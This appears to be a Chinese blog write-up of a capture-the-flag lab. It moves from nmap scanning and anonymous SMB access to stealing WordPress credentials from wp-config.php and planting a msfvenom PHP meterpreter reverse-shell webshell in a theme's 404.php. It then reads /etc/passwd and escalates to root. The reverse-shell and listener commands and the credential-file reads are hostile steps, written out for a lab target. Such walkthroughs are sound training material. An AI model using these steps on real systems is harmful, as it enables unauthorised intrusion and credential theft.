2020-12-08

SMB信息泄露

SMB协议是基于TCP - NETBIOS下的,一般端口使用为139,445
SMB协议,计算机可以访问网络资源,下载对应的资源文件

实战练习

探测靶场地址

先确定kali linux ip地址

ifconfig 

在这里插入图片描述然后检测同物理段ip地址

nmap -sP 192.168.190.1/24

在这里插入图片描述靶机地址应该为192.168.190.131,可以信息探测一下确定

信息探测

渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限

挖掘开放服务信息:nmap -sV 192.168.190.131

在这里插入图片描述

挖掘靶场全部信息:nmap -A -v -T4 IP

在这里插入图片描述

分析探测结果

每一个服务对应计算机的一个端口,用来进行通信。常用端口0~1023端口,在扫描结果中查找特殊端口
针对特殊端口进行探测,尤其对开发大端口的http服务进行排查;

针对SMB协议弱点分析

1.SMB协议。使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;

--smbclient-L IP

空密码登录
在这里插入图片描述

-- smbclient '\\IP\print$'

在这里插入图片描述

-- smbclient '\\IP\share$'

在这里插入图片描述

--smbclient '\\192.168.190.131\IPC$'

在这里插入图片描述可以看出空链接没有什么利用价值

接下来我们探测一下敏感信息
– get敏感文件
在这里插入图片描述
在这里插入图片描述
接下来来看一下wordpress文件夹
在这里插入图片描述

配置文件中一般是有用户名和密码的,所以我们查看一下配置文件
先下载

get  wp-config.php

在查看

cat  wp-config.php

在这里插入图片描述

我们可以注意到用户名和密码
接下来我们远程登陆一下mysql数据库
在这里插入图片描述
发现并不能登录远程服务器
所以我们使用一下ssh进行登录,这里的密码就是wp-config.php里的密码,这里服务关闭
在这里插入图片描述
我们可以用以下方法重新打开wp-config.php
在这里插入图片描述
在这里插入图片描述

2.针对SMB协议远程溢出漏洞进行分析;
先探测一下靶场全部信息,探测出版本号

nmap -A -v -T4 192.168.190.131

在这里插入图片描述

– searchsploit samba版本号
在这里插入图片描述
这里可以看到没有任何结果信息,如果有的话我们可以直接获取靶场信息

针对HTTP协议弱点分析
1.浏览器查看网站;扫描网站
dirb http://192.168.190.131/

在这里插入图片描述
打开此链接http://192.168.190.131/wordpress/wp-admin/admin.php

在这里插入图片描述
然后登陆成功后进入后台界面
在这里插入图片描述
2.寻找突破点,目标登录后台, 上传webshell;

制作webshelI
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw
在这里插入图片描述
然后切换至桌面,将php文件复制到webshell.php
在这里插入图片描述
设置监听
msfconsole
在这里插入图片描述

msf >use exploit/multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_ tcp
在这里插入图片描述

msf exploit(handler) > set lhost 攻击机IP地址
在这里插入图片描述

msf exploit(handler)> set lport 4444

msf exploit(handler)> run
在这里插入图片描述

上传webshell
打开此界面
在这里插入图片描述

将webshell.php中的代码复制到404代码中,并且update file
在这里插入图片描述
访问具有webshell的php界面
获得反弹的shell
wordpress 上传点 theme 404.php
执行:http://靶场ip/wordpress/wp-content/thems/twentyfifteen/404.php

查找flag信息
优化终端: python -c "import pty; pty.spawn( “/bin/bash”)’
查找敏感信息,提升root权限,查看flag值。
查找用户名: cat /etc/passwd
查找密码:在共享目录下的敏感文件,提升权限
togie这个用户很重要(密码12345)
– su用户名
– sudo -I
– su sudo

切换到root用户
接下来获取flag值
cat flag.txt

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值